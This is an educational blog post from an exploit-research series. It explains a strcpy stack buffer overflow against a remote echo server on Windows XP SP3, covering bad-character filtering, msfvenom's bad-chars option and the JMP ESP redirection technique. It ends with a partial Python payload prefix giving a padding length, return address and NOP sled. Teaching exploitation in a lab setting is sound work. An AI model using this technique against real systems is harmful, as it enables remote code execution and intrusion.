Exploit Research — “The JMP ESP”
Overview:
This is a continuation of the exploit research series, check out the blog before this here. For the sake of brevity, I will not reiterate some of the ideas covered earlier like ‘the stack’ or how to generate a payload using ‘msfvenom’ etc since this exploit will be primarily reusing them with some slight modification.
The Exploit — Strcpy on Win XP SP3:
The stack is the the section of the memory which is used like a temporary scratchpad where a lot of variables and functions are stored, here we will be using the same idea of buffer overflow but with a slight change. The function we are trying to exploit, filters out some characters which will need us to make changes in our exploit design.
So what’s different?
We are trying to exploit a remote echo server, which uses ‘strcpy’ function. Though it suffers from the buffer overflow as the exploit before, strcpy puts certain restrictions on the strings we can send to it. Certain characters are considered as string delimiters and the function treats it as the end of string. If these characters are present in our exploit, they will be dropped and the string will be truncated, and the characters beyond it.
To take this into account, we would have to make sure none of these characters are included in our exploit. Since we are not crafting our own shellcode for this challenge, we can leave the exclusion of these characters to msfvenom, and focus on the return address since that is the only part of the exploit string we supply based on our deductions.
The first step would be to identify these ‘bad characters’. This can be done by sending the exploit string and seeing where the payload is getting truncated. Usual culprits are newlines, nulls, tabs etc (In hex 0A,00,0D).
The payload we generated using msfvenom, we can have these characters excluded by generating the payload by supplying an extra-parameter “— bad-chars ‘\x00\x0a\x0d’”
Though metasploit does it seamlessly, when we get into the art of writing shellcode ourselves, we explore different techniques so that it does not have the bad characters, how to encode it to bypass string based detection, and also making it position independent.
Problem solved?
The payload doesn’t have the bad characters anymore, but we aren’t done yet.
In our last exploit we had a hardcoded address in the stack where our shellcode was located at. This would be all dandy, but a wrench in the works is thrown, since stack addresses now have (“0x00”)
Here we bring in a technique called ‘JMP ESP’. So we have our shellcode on the stack, and we need to move to that address without specifying the shellcode hardcoded address directly. We can use the JMP instruction, to jump to the stack, and stack top is pointed to by the ESP register.
So we overwrite the return address with the address of this “JMP ESP” instruction, and when the return address executes this instruction, it will return to the stack.
Now we just need to find this instruction within the loaded libraries , and Immunity debugged (in general any debugger) can help us find the address of any this command.
One of the addresses out of the many results is “7e429353”. Pasting the prefix part, (the shellcode can be generated by msfvenom, appended and sent over in similar fashion using python as the last challenge).
buf=""
buf+="A"*268
buf+="\x53\x93\x42\x7e"
buf+="\x90"*100
buf+={msfvenom output}